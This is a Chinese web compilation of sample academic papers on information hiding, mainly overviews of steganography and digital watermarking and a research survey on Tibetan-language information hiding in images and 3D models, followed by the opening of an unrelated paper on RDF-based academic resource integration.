隱藏技術論文大全11篇

時間:2022-08-18 04:17:50

緒論:寫作既是個人情感的抒發,也是對學術真理的探索,歡迎閱讀由發表云整理的11篇隱藏技術論文范文,希望它們能為您的寫作提供參考和啟發。

隱藏技術論文

篇(1)

多媒體技術和通信技術帶來極大方便,但數字化的多媒體信息很容易受到非法訪問、篡改、復制和傳播,給人們的生產生活及生命財產帶來隱患。魔高一尺道高一丈,信息隱藏技術應運而生。

一、信息隱藏技術及其特征

信息隱藏技術利用載體數據的冗余性以及人的感官局限性,將一個特定信息隱藏在另外一個被稱為載體的信息中。信息隱藏技術融合電子工程、計算機科學、信號處理、通信、多媒體技術等多學科,是新興技術體系。信息隱藏所用載體可以是文本、圖像、音頻、視頻,甚至可以是某個信道或某套編碼體制。信息能夠隱藏在載體中,載體數據本身具有很大的冗余性,未壓縮的多媒體信息編碼效率是很低,將某些信息嵌入到該載體信息中進行秘密傳送完全可行,不會影響多媒體信息本身的傳送和使用;人的感覺器官對于所接收信息都有一定掩蔽效應,如人耳對不同頻段聲音敏感程度不同,可將信息隱藏到載體中而不被覺察。

信息隱藏技術的特征明顯:不可察覺性,嵌入信息后,要求不會引起載體發生可感知變化;不可檢測性,嵌入隱藏信息后,計算機不能發現和檢測;安全性,嵌入信息后,必須擁有相關信息才能夠提取所嵌入內容;純正性,提取操作時,即便載密文件受到損壓縮、解壓縮、濾波、轉換等擾動,也能提取隱藏信息;穩定性,隱藏信息能“永久”存在;安全性,第三方在不知道隱藏算法和隱藏密鑰情況下,不能獲取信息相關數據。信息隱藏技術按載體分為,基于文本、圖像、音頻、視頻、超文本、網絡層、圖形等媒體的信息隱藏技術;按嵌入域分為基于空域(或時域)和變換域的隱藏技術;按嵌入策略分為替換調制、模式調制和擴頻疊加調制等技術;按提取要求分為盲隱藏技術和非盲隱藏技術;按作用分為隱蔽通信和數字水印技術;按密鑰分為無密鑰隱藏和有密鑰隱藏。

二、信息隱藏技術的研究及演進

信息安全事關個人利益,也事關國家安全、社會穩定以及經濟發展,各國政府無不重視信息和網絡安全。密碼技術一直是保障信息安全的重要手段,但這并不能解決問題。截獲者發現網絡文件加密,往往會引起注意,并激發其破解欲望,即使不能成功破解,也能輕易攔截并破壞秘密信息,干擾通信進行。針對密碼技術的局限性,上世紀90年代國際上出現了信息隱藏技術(InformationHiding)。

現代信息隱藏研究主要集中在靜態圖像領域,目前信息隱藏所用載體已擴展到文字、圖像、聲音及視頻等領域。在全球信息化、數字化迅猛發展時代背景下,對知識產權保護、隱密通信等需求激發了對信息隱藏技術的研究熱潮。國際上研究信息隱藏的機構主要有劍橋大學、麻省理工學院、NEC美國研究所、IBM研究中心等,已提出了一些優秀隱藏算法。我國于1999年在何德全、周仲義、蔡吉人等三位院士大力倡導下召開了第一屆信息隱藏學術研討會,我國對信息隱藏的研究也取得重要成果。目前在信息隱藏中無論是數字水印還是隱密通信,都得到越來越廣泛應用。應用領域不斷擴大,從最初靜態圖片發展到文本、音頻、視頻、電腦文件、流媒體、網頁及網絡傳輸中的數據包,甚至是無線通信領域中的語音通信和手機彩信等領域。我國對信息隱藏的研究取得了很多成果,基本與世界水平保持一致。如今信息隱藏研究已出現百花齊放、百家爭鳴局面。

三、信息隱藏技術的應用

隨著信息技術飛速發展,人類利用的信息越來越豐富,通信技術發展使人們能夠方便、快捷、靈活地使用文本、語音、圖像與視頻等多種方式通信;各種數字化信息處理技術使得網絡中傳輸任何類型的文件(如文本、圖像、音頻和視頻等)都可被數字化,極大方便了對各種信息數據壓縮、存儲、復制、處理和利用。

信息隱藏技術主要有隱寫術和數字水印。目前,信息隱藏技術的應用主要在以下方面:一是隱密通信。通過隱寫術將秘密信息嵌入在公開媒體文件中傳播消息。早期的隱密通信,接收方和發送方甚至不必交換電子郵件,直接交互文件或登錄特定計算機和賬戶。隨著網絡及通信技術發展,隱密通信所用通信方式從簡單數據文件交互到互聯網以及無線通信領域。二是版權保護。通過數字水印技術在媒體文件中嵌入特定數字標識或簽名,標識媒體文件所有權和版權信息等。三是數據完整性保護。防護篡改、完整性保護中所采用的數字水印為易損水印或脆弱水印,任何對媒體文件修改都會從隱藏數據中反映出來。四是印刷品防偽。印刷品印刷之前嵌入一定標識信息,印刷后作品可經過掃描再次輸入計算機,通過特定水印提取和鑒別方法來鑒別作品真偽。五是拷貝控制。控制媒體文件拷貝次數,防止大規模盜版或非法復制。

信息隱藏技術重點運用領域是移動通信領域。移動通信網絡方便快捷,在軍事和商業通信中廣泛應用。移動通信領域多媒體短信將文本、圖片、音頻、視頻等組合成多媒體消息進行發送。移動通信領域中多媒體短信以其特有的直觀性、生動性和集成性,面市以來得到廣泛關注。多媒體短信即彩信的最大特色是支持多媒體功能,可將不同的媒體,如文本、圖片、音頻、視頻等組合在一起進行發送。彩信標準并沒有對彩信所支持的文件格式給出具體限制,理論上只要在封裝打包時為彩信所包含的各媒體文件設置好適當類型參數即可;但實際上具體的彩信所支持媒體格式還是有限的,這主要與手機終端彩信軟件和MMSC支持傳送媒體格式有關。隨著3G普及以及手機終端行業發展,彩信所支持的媒體文件格式將更豐富多樣,為信息隱藏技術在彩信中的應用提供了更為廣闊的空間。

【參考文獻】

篇(2)

中圖分類號:TN401 文獻標識碼:A 文章編號:2095-1302(2014)12-00-05

0 引 言

安全、有效的信息傳輸對國家安全、社會穩定和人民安居樂業至關重要。網絡和多媒體技術的發展,使得信息傳輸的速度和數量正以驚人的增量發展。然而,信息傳輸的便利在方便人們的同時也給信息安全帶來了隱患,同時也為基于數字載體的秘密信息傳輸提供了廣闊的研究空間。目前,基于載體的秘密信息傳輸是信息安全領域的一個方興未艾的研究熱點。而基于載體預處理的藏文信息隱藏技術將為信息安全領域提供一些新的數字信息共享和傳輸理念,特別是藏文的預處理規律、在數字信息中的隱藏規律等,將有助于涉藏秘密通信技術的發展,并可以對民用和商用領域中涉及到藏文內容的傳輸、共享、存儲和提取的通信過程起到安全保護、版權保護及完整性認證的作用,并對國家涉藏領域的網絡輿情監控、國內外涉藏敏感信息標注和情感色彩認知起著至關重要的作用。

在藏文信息隱藏技術方面,目前主要涉及的技術有關鍵字識別、字符識別和提取、韻律認知、語義角色標注、文本資源挖掘和語料抽取等,并以此為基礎進行置亂優化。

1 國內外信息隱藏技術研究現狀

信息隱藏一直是信息安全領域中保障隱秘信息安全傳輸和數字信息版權的重要手段,也是近年來國內外學者研究的熱點之一。最新的一屆ACM信息隱藏和多媒體安全會議(ACM IH&MMSec’13 Workshop)的主要研究內容有信息隱藏算法、多媒體水印和認證、載體運算域的數字信號處理等。其中,信息隱藏算法的設計首先依賴于載體的選擇和預處理;關于多媒體水印和認證的研究則將信息隱藏和數字水印的載體范圍從數字圖像等常見載體拓展到了包括三維模型在內的新型載體上;載體運算域的數字信號處理涉及到了載體預處理時所用的具體方法,如空間域或變換域等。2013年IEEE 圖像處理國際會議(IEEE ICIP 2013)的主要研究內容包括圖像、音視頻和3-D等多媒體的信息隱藏算法和多媒體特征提取和分析等,這兩類研究內容均與載體的選取和預處理有關。最新一屆信息隱藏國際會議(IH2012)的主要研究內容包括多媒體安全和其他載體的信息隱藏。我國的第十一屆全國信息隱藏暨多媒體安全學術大會(CIHW2013)中關于信息隱藏算法的研究內容也主要集中在非常規載體的分析和預處理上。

藏文作為信息隱藏領域一種新的信息格式,對其研究主要局限于藏文操作系統、藏文信息技術標準、藏文信息處理等幾個方面[1],具體內容集中在藏文編碼字符集、術語集、拼音輔助集等的建立。

基于載體的秘密通信技術是20世紀90年代中期發展起來的跨領域的學科,而載體的預處理技術一直是其研究的主要方向。對隱藏載體進行預處理,生成信息隱藏嵌入區域是信息隱藏算法中最重要的研究內容之一。從上述國內外各學術會議中關于信息隱藏的參會論文和研討情況看,各類載體固有特性的研究對預處理技術有著重要的意義,且數字圖像依然是主要的一類載體,而三維模型將是未來主要研究的一類非常規載體。下面就對數字圖像和三維模型兩類載體的預處理技術的研究現狀進行闡述。

1.1 數字圖像預處理技術研究綜述

基于數字圖像的信息隱藏技術是信息隱藏學科中重要的技術分支,是目前應用最廣、覆蓋范圍最大的信息隱藏技術手段。在基于數字圖像的信息隱藏技術研究中,信息隱藏區域的生成是關系算法性能的重要因素。信息隱藏區域的生成方法主要包括空間域生成法、變換域生成法以及空間域和變換域聯合的生成方法。

空間域算法:作為空間域算法中出現最早、操作最簡單且應用最廣泛的算法,基于位平面分解理論的LSB算法可以直接替換的方式隱藏較大的數據量,劉紅翼等提出的一種LSB算法具有容量大、運算量小的特點[2];劉文彬等提出的LSB隱寫替換的消息定位方法則可以對此類算法進行檢測[3];而IH2012的論文中,有學者運用假設檢驗理論和含秘載體的奇偶感知特性可有效地檢測LSB算法所隱藏的隱秘信息[4,5],這些研究為藏文信息隱藏中涉及到關于此類算法的抗檢測性研究提供了新的待改進方向。張焱等提出的像素值排序和趙彥濤等提出的直方圖修改等空間域算法在沿用LSB直接替換的隱藏理念的同時,還提升了魯棒性,因此也被廣泛用于數字圖像載體預處理[6,7];隨后,楊春芳等提出了針對此類算法的檢測方法[8],這也為針對此類算法抗檢測性改進的研究提供了重要依據。此外,上述同類算法中的載體子區域劃分思想、內容自適應思想等也對本項目基于載體結構特性建立空間匹配模型的機制提供了方法學上的有力支持[9-13]。

變換域算法:不同于空間域算法直接對載體的空間特性進行修改,變換域預處理方法以修改載體的頻率參數來隱藏信息[14],因此算法的魯棒性比空間域算法好。在此基礎上,唐燕等又對隱秘信息的檢測和恢復進行了研究和改進,實現了幾乎無需原始參量的半盲提取[15]。盡管變換域算法不具備空間域算法容量大、運算量小和易操作等優勢,但是變換域中的多小波理論因其同時具有對稱性、短支撐性、二階消失矩和正交性等特性成為了信號處理中有明顯優勢且較常用的方法,在前期研究中利用多小波方法將數字圖像載體分塊后作為嵌入區域,提高了算法的魯棒性和不可見性[16,17],這種方法為在藏文信息隱藏研究中建立基于區域能量的階梯性分布機制提供了一種研究手段。

混合域算法:較單獨運用一種空間域或變換域生成隱藏區域并設計信息隱藏算法來看,基于空間域與變換域聯合的信息隱藏算法可以兼有多種算法的性能優勢。在基于空間域和變換域聯合的信息隱藏算法中,空間域的作用體現在數據嵌入的具體操作方面,因為隱藏的實質就是在當前環境下的空間分量上進行數據修改,利用邊緣像素值差分(Edged Pixel Value Differencing,EPVD)將載體換算為若干個像素塊,以最大斜角的數據修改作為信息隱藏的具體方法[18];利用濕紙碼和基于LSBM的雙層隱寫來對載體進行加1嵌入或減1嵌入[19];另外,國內外許多學者利用調色板理論進行數據嵌入[20,21]。而變換域在載體預處理中的主要作用是生成滿足特定需要的信息隱藏環境(區域),主要包括變換后的系數分布以及n階分量子圖等。如對RSV顏色空間的V分量做DCT變換,分塊后作為嵌入區域[22];利用視覺顯著點技術確定跟蹤窗(Regions of Interest,ROI),在ROI的DCT系數上嵌入隱藏信息,并指定某個ROI邊緣地圖脆弱性標識,嵌入到DWT變換后的含密圖像中[23];前期研究中,研究人員利用自適應顏色遷移理論中lαβ域對顏色的控制力,消除了RGB顏色分量的強相關性,并結合GHM能量分區隱藏信息,在不可見性、嵌入信息量和魯棒性方面均具有較好的表現[24]。

1.2 三維模型預處理技術研究綜述

潘志庚等將基于三維模型的信息隱藏預處理方法主要分為空間域算法和變換域算法[25]。這也這為藏文信息隱藏研究提供了新的思路和方法。

空間域算法:空間域算法通常具有易嵌入和盲提取的特點,如直接置換載體的幾何信息來隱藏數據是三維模型載體信息隱藏最原始、最直接的方法[26]。為改進此類算法的魯棒性,引入仿射不變量是有效的措施,如利用具有連續解析性的仿射不變量優化需要置換的頂點[27]、 將穩態錨點通過三角垂心編碼解析為聚類元素從而嵌入隱秘信息[28]。此外,基于主元分析的算法也有助于改善空間域算法的魯棒性,例如可根據主元分析(Primary Component Analysis,PCA)來確定模型的關鍵位置作為魯棒區域,并用網格分割法改進魯棒性和不可見性[29-32]。這類算法也為藏文信息隱藏從載體結構特性進行解析和預處理提供了理論依據。改進型的空間域算法多針對魯棒性或容量性有所提升,如基于連續解析性的體積矩的盲算法,改善了之前算法對連通性攻擊的魯棒性[33];通過重排頂點和面片在網格文件中的表示信息,利用表示域內的信息進行嵌入使算法具有良好的不可見性和大容量性[34],但對相似變換以外的攻擊不具有魯棒性。

變換域算法:三維模型預處理的變換域方法大多利用頻譜分析將模型信息參數化[35],對參數進行少量修改后以隱藏信息,其中,基于小波變換的算法可以對規則和非規則網格模型進行小波域參量修改以嵌入較多信息[36]。理論上,變換域算法比空間域算法魯棒性強,但由于三維模型頂點的天然無序性和不規則性,對其進行頻譜分析難度大,導致變換域算法實用性目前較低,因此空間域算法依然是比變換域算法更有實用價值的研究方向[37]。

2 藏文信息隱藏技術研究現狀

目前反映藏文信息處理技術最新進展的文獻較少,綜合以已有的研究成果及相關研究文獻,藏文信息處理可劃分為藏語信息處理和藏字信息處理兩個層次[38,39]。藏語信息處理包括機器翻譯、信息檢索、信息提取、文本校對、文本生成、文本分類、自動摘要以及藏文字識別和語音識別的后處理等等;而藏字信息處理包括操作系統以及編碼字符集、輸入技術、字形描述與生成、存儲、編輯、排版、字頻統計和藏字屬性庫等。這些研究基礎對藏文信息隱藏技術的發展至關重要,是基于載體預處理的藏文信息隱藏的主要技術來源。鑒于藏文的獨特構造,以及藏文的特點,目前對藏文秘密信息的預處理技術一般指置亂和加密算法的選擇[40],而置亂使信息變得雜亂無章難以辨認,可以起到加密與改變信息嵌入特性的作用。可用于藏文信息隱藏的置亂算法主要有Arnold變換、幻方矩陣、Gray碼變換、混沌序列等方法[41]。其中,Arnold變換算法簡單且置亂效果顯著,使有意義的數字圖像變成像白噪聲一樣的無意義圖像,實現了信息的初步加密和信息結構的調整,在嵌入信息為數字圖像時可以很好的應用[42]。幻方置亂的思想基于查表思想,基于數字圖像的幻方置亂可降低幻方置亂階數或以圖像塊進行置亂,實現置亂效果與系統開銷的平衡[43]。Gray是一種具有反射特性和循環特性的單步自補碼,它的循環、單步特性消除了隨機取數時出現重大誤差的可能,它的反射、自補特性使得求反非常方便[44]。混沌的優勢在于對初始條件的極端敏感和軌跡在整個空間上的遍歷性。根據經典的Shannon置亂與擴散的要求,這些獨特的特征使得混沌映射成為信息隱藏嵌入算法的優秀候選[45]。上述傳統的置亂算法一般用于正方形圖像處理,而經過改進的Arnold算法可直接用于寬高不等的矩形圖像而不必進行正方形擴展[46],這也將是藏文信息隱藏技術所采用的主要置亂方法之一。

3 藏文信息隱藏技術的研究目標、研究內容和要解決的問題

3.1 研究目標

面向藏文安全通信的高性能信息隱藏算法是目前藏文信息隱藏技術的主要目標,包括提出性能出色的、適合藏文通信要求的信息隱藏算法;提出一種具有普適性的高性能信息隱藏嵌入區域生成原則和嵌入規則:

(1) 基于數字圖像的藏文信息隱藏算法:提出至少兩種基于數字圖像的藏文信息隱藏算法,算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(PSNR≥34.90dB)、強魯棒性(抗擊大約69%以下的JPEG2000壓縮、35%以下的剪切及常見濾波與加噪)、大容量性(基于彩色圖像的信息隱藏信息嵌入率≥18%)以及高感知篡改性(檢測隱藏數據是否被篡改能力≥95%)。

(2) 基于三維模型的藏文信息隱藏算法:提出至少一種基于三維模型的藏文信息隱藏算法。算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(RSNR≥69.94dB、En≥70%)、應對一般攻擊的強魯棒性(抗擊大約0.10%隨機加噪、50-times Laplacian平滑、50%均勻重網格化以及均勻簡化等)、大容量性(相對理想的RSNR,嵌入率≥29%)以及低復雜度(根據載體模型幾何信息量而變化)。

(3) 普適性信息隱藏嵌入區域生成原則和嵌入規則:利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則,將適應于所有對數字圖像處理后有能量區別的圖像處理方法,指導設計者利用能量與魯棒性、復雜度與不可見性的對應關系,研究出同時滿足不可見性和魯棒性的信息隱藏算法。

3.2 研究內容

(1) 藏文信息隱藏區域生成原則與規則研究:數字圖像信息隱藏技術的研究核心集中在隱藏區域和嵌入規則的設計上,藏文信息隱藏算法的設計方法和思路就是在選定藏文信息隱藏區域以及制定好信息隱藏規則后,按照一定的順序將兩者進行合理的組織,所以研究藏文信息隱藏區域生成原則以及信息隱藏規則是重點。

(2) 基于數字圖像的藏文信息隱藏算法研究:隱藏算法是基于數字圖像的信息隱藏技術的研究核心,需按照嵌入域進行劃分,對基于空間域和基于變換域的信息隱藏算法分別進行研究,提出單獨基于空間域、單獨基于變換域以及兩者聯合應用的數字圖像信息隱藏算法。

(3) 基于三維模型的藏文信息隱藏算法研究:首先對三維模型的結構特性和能量特性進行研究,再根據載體模型的特性找出對應的預處理方法。在研究基于空間域和基于變換域的信息隱藏算法的基礎上,提出改進型的三維模型信息隱藏算法。主要用于提升載體有效嵌入容量和降低載體視覺失真度。

(4) 載體與藏文秘密信息的一致化方法研究:基于上述研究基礎,生成結構和能量差異化子區域,再將藏文秘密信息按照拼音屬性進行解析生成信息序列。再利用優化算法使得預處理后的載體信息和藏文秘密信息的解析編碼獲得最大一致化,從而提高算法性能。

3.3 需解決的關鍵問題

綜合已有的研究,在藏文信息隱藏技術方面,目前需要解決的問題有以下幾個方面:

(1) 信息隱藏區域與嵌入規則設計:在具有什么性質的區域內應用什么樣的規則進行藏文信息隱藏才可以解決“不可見性與魯棒性的對立、容量性與抗分析性的對立”問題,是藏文信息隱藏研究領域的關鍵技術之一。需找出隱藏區域的性質與信息隱藏性能的關系,提出面向藏文信息傳輸的信息隱藏區域選擇的原則與方法;給出在具有具體性質的嵌入區域中的藏文信息隱藏嵌入規則的制定原理和方法;提出大量的藏文信息數據轉換思想與方法,以提供形式多樣的信息隱藏嵌入規則。

(2) 數字圖像載體預處理方法:①多小波理論在載體預處理中的應用。對于數字圖像經過多小波變換后所具有的特殊性質,找出多小波變換后數字圖像所具有的能量特性與基于數字圖像信息隱藏算法性能之間所遵循的規律已有學者進行研究。②顏色空間的性能分析與應用選取。RGB、CMYK、lαβ、YUV以及HSx顏色空間,應用方法以及應用各有優劣勢。該技術的應用難點在于為顏色空間在藏文信息隱藏的應用提出完備的應用方案,因為這些顏色空間在藏文信息隱藏技術中的應用目前非常少,應用優劣還處于實驗驗證階段,沒有理論驗證的支持。

(3) 三維網格模型載體預處理方法:骨架抽取和內切球解析技術在藏文信息隱藏算法中的應用。這種方法不涉及頂點數量及坐標的改變和拓撲關系的修改。難點在于尋找一個理想的仿射不變量作為輔助參數以彌補算法對縮放攻擊的脆弱性。

(4) 藏文的置亂與遺傳優化算法:有的藏文字處理系統把藏文看成是由30個輔音、4個元音、3個上加字、5個下加字共42個藏文字符組成的,而有的則認為由其他數量的字符組成。基于對藏文中加字對發音的影響規律的研究,利用字符與二進制碼的解析規則和置亂與優化技術對信息置亂,達到隱藏信息與載體信息的最大匹配度也是一個技術難點。

4 藏文信息隱藏技術研究的新方法

(1)利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則。高能量與強魯棒、高復雜度與高不可見性的對應關系,從根本上解決藏文信息隱藏算法中不可見性和魯棒性的對立問題,為面向藏文通信安全的信息隱藏算法的設計給出一種普適性方法。

(2)根據數字圖像信息隱藏嵌入區域的生成原則和嵌入規則,提出新的、高性能的數字圖像的藏文信息隱藏算法。算法利用lαβ等顏色空間轉換以及多小波對載體圖像進行的處理,生成具有不同能量特性的嵌入區域,從頻率域上滿足藏文信息隱藏的應用要求;通過對載體圖像進行顏色遷移、矢量解析以及環形處理,從數字圖像的空間結構上滿足藏文信息隱藏的應用要求。

(3)提出滿足三維模型結構特性和能量特性的藏文信息隱藏算法。算法利用局部高度理論和均值偏移理論對載體模型進行預處理,生成具有不同能量特性的嵌入區域,從頻域上滿足信息隱藏的應用要求;通過對載體圖像進行骨架抽取、內切球解析,從空間結構上滿足藏文信息隱藏的應用要求。

參考文獻

[1]陳玉忠,俞士汶. 藏文信息處理技術的研究現狀與展望[J]. 中國藏學. 2003(4):97-107.

[2]劉紅翼,王繼軍,韋月瓊,等.一種基于LSB的數字圖像信息隱藏算法[J].計算機科學,2008, 35(1):100-102.

[3]劉文彬,劉九芬.一種針對LSB替換隱寫的消息定位方法[J].信息工程大學學報,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 張焱,張敏情,甕佳佳.基于直方圖對的大容量信息隱藏算法[J].計算機應用研究,2013,30(7):2108-2111.

[7] 趙彥濤,李志全,董宇青.基于排序和直方圖修改的可逆信息隱藏方法[J].光電子.激光,2010,2(1):102-106.

[8] 楊春芳,劉粉林,羅向陽.基于相對熵的直方圖差異與JPEG隱寫的定量分析[J].計算機研究與發展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方圖平移的彩色圖像可逆信息隱藏[J].四川大學學報,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和紅杰,張家樹.對水印信息篡改魯棒的自嵌入水印算法[J].軟件學報,2009,20(2):437-450.

[15] 唐燕,閭國年,殷奎喜.規范類正交矩陣的信息隱藏算法[J].東南大學學報,2013,43(1):45-49.

[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,張韜.整數小波域濕紙碼自適應信息隱藏算法[J].計算機輔助設計與圖形學學報,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帥,張|,慕德俊,等.基于GHM多小波與自適應顏色遷移的信息隱藏算法研究[J].西北工業大學學報,2010,28(2):64-269.

[25] 潘志庚, 孫樹森, 李黎.三維模型數字水印綜述[J].計算機輔助設計與圖形學學報,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖學良,王屏.一種新的三維模型水印嵌入空域算法[J]. 計算機學報,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

[35] 胡敏,劉輝.基于特征點的自適應三維網格數字水印算法[J].合肥工業大學學報(自然科學版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陳力為. 中文信息處理叢書序言[M].北京:清華大學出版社,2000.

[39]俞士汶,朱學鋒,賈玉祥. 漢語隱喻自動處理研究之概況[C].第四屆文學與信息技術國際研討會,2008.

[40] 譚良,吳波,劉震,等.一種基于混沌和小波變換的大容量音頻信息隱藏算法[J].電子學報,2010,38(8):1812-1819.

[41] 丁瑋,閆偉齊,齊東旭.基于置亂與融合的數字圖象隱藏技術及其應用[J].中國圖象圖形學報,2000,5(8):644-649.

[42] 田云凱,賈傳熒,王慶武.基于Arnold變換的圖像置亂及其恢復[J].大連海事大學學報:自然科學版,2006,32(4):107-109.

[43] 彭萬權,張承暢,馮文江,等.多階幻方卷積碼的構造及譯碼[J].電子學報,2013,41(1):123-130.

篇(3)

中圖分類號:TP391文獻標識碼:A文章編號:1009-3044(2012)09-1985-03

An RDF-based Integration Model of Academic Resources

YAO Jin-feng1, CHEN Lei2

(1.School of Computer Science and Engineering, Anhui University of Science and Technology, Huainan 232001, China; 2.Department of Computer and Information Engineering, Huainan Normal University, Huainan 232038, China)

Abstract: Resources like papers or thesises can be abstraced as knowledge base. After analysed, we find it is appropriate to describe the Web objects of the academic resources using the Resource Description Frame(RDF) statements, and also, we can create the academic ontology with OWL. This paper proposes a mechamism of the semantic query and logical inference, deploys a academic resource knowledge discovery system which has the characters of the Semantic Web, and it will faciliate the user query and the management.

Key words: semantic web; RDF; academic resources; ontology

1概述

對于高校的教師和學生而言,論文之類的學術資源是一種從事學習和科研的重要知識資源,對它們的搜索與發現也是教師和學生的知識獲取的重要手段。為了幫助用戶的搜索,各高校和一些相關機構都推出了一些論文查詢機制(如萬方、維普等),極大地方便了相關人群的使用。

論文資源的組織本質上屬于知識管理工程。知識管理所關注的是在一個組織中獲取、處理和維護知識。對于大型論文資源庫而言,有效地進行知識管理,在機構內部實施先進科學的知識組織與維護方式,對外則提供高效、高質量的用戶查詢(咨詢)服務則是相關機構創造新的價值和增強競爭力的有效保證。目前大多數可用信息只具有弱結構組織形式,從知識管理的角度來說,現有技術存在以下諸方面的局限[1]:

1)信息搜索。當今的互聯網通常依靠基于關鍵詞的搜索引擎,這使得搜索的結構總是“高匹配、低精度”,而且從搜索結果的形式來看,總是單一的網頁,如果所需要的信息分布在不同的文檔中,則用戶必須給出多個查詢來收集相關的頁面,然后自己提取這些頁面中的相關信息并組織成一個整體。

2)信息抽取。需要人工瀏覽搜索的文檔,當前的信息組織形式還不能滿足智能軟件(Intelligent Agent)的要求。

3)信息維護。比如術語的不相容性和無法移除過時的信息等。

4)信息挖掘。雖然可以用數據挖掘(Data Mining)等手段提取隱藏在信息數據庫中的新知識,但對于分布式的、弱結構化的文檔集合,這個任務仍然是困難的。

5)信息視圖。經常需要限制某些用戶對某些信息的瀏覽權限。“視圖”意味著隱藏某些信息,在傳統數據庫中很容易做到這一點,但對于論文資源服務網站來說尚難以實現。

基于本體的論文資源語義網的研究的主要目的就是解決上述問題,并借助于自動推理機從給定的知識演繹出一些結論,從而使隱含的知識外顯出來,并以期通過相應的(Agent)收集和整理信息,為用戶提供備選方案。

2語義Web技術基礎

語義Web研究的重點就是如何把信息表示為計算機能夠理解和處理的形式,即帶有語義。它主要基于XML和RDF/RDFS[2],并在此之上構建本體和邏輯推理規則,它完全基于語義的知識表示和推理,從而能夠為計算機所理解和處理。

